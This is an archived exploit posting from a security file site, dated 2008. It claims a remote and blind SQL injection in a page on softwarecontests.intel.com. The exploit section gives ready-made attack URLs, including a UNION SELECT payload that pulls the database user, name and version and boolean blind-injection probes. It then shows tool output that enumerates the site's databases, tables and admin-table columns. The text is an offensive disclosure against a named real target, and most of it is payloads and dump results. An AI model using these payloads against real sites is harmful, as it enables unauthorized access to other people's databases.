what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

intel-sql.txt

intel-sql.txt
Posted Oct 12, 2008
Authored by CraCkEr

Intel.com suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 5fe6fb8f53b3a500f328d30f0d29c1039531799019f9b396af59755870013ac7

intel-sql.txt

Change Mirror Download
┌┌───────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ [ EZINE ] ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Website : intel.com │ │ Famous Sites Can Be │
│ Vuln Type: Remote + Blind SQL INJ │ │ │
│ Method : GET │ │ Olso Vulned │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : Database access │ │ │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│ DALnet #crackers ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘

[+] Remote SQL

http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=-1 UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--


[+] Blind SQL

http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=1 and 1=1

http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=1 and 1=0


[+] Text Change

Project/Company URL


[+] Attack Results


[+] URL:http://softwarecontests.intel.com/gamedemo/entrydetail.php?entryid=1
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 02:05:19
[+] Number of Rows: 3

[0]: contests
[1]: contestsapac
[2]: gamecontest



[+] Showing Tables from database "contests"

[0]: cp_article
[1]: cp_category
[2]: cp_comment
[3]: cp_content
[4]: cp_contest
[5]: cp_country
[6]: cp_email
[7]: cp_entry
[8]: cp_entrytext
[9]: cp_previewimages
[10]: cp_regtext
[11]: cp_rhclinks
[12]: cp_rhctext
[13]: cp_spotlight
[14]: cp_state
[15]: gd_category
[16]: gd_comments
[17]: gd_content
[18]: gd_country
[19]: gd_entry
[20]: gd_entrytext
[21]: gd_regtext
[22]: gd_rhclinks
[23]: gd_rhctext
[24]: gd_spotlight
[25]: gd_state
[26]: gd_votecount
[27]: tc_admin
[28]: tc_common_avatar
[29]: tc_common_user
[30]: tc_entry
[31]: tc_entryattachment
[32]: tc_points
[33]: tc_pointsmeta
[34]: tc_problemattachment
[35]: tc_problemset
[36]: tc_status



[+] Showing Columns from database "contests" and Table "tc_admin"

[0]: id
[1]: homepagetext
[2]: registerpagetext
[3]: alluserstext
[4]: spotlight1
[5]: spotlight2
[6]: spotlight3

[-] 19:38:33
[-] Total URL Requests 578
[-] Done



└────────────────────────────────────────────────────────────────────────────┘

Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2008 ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close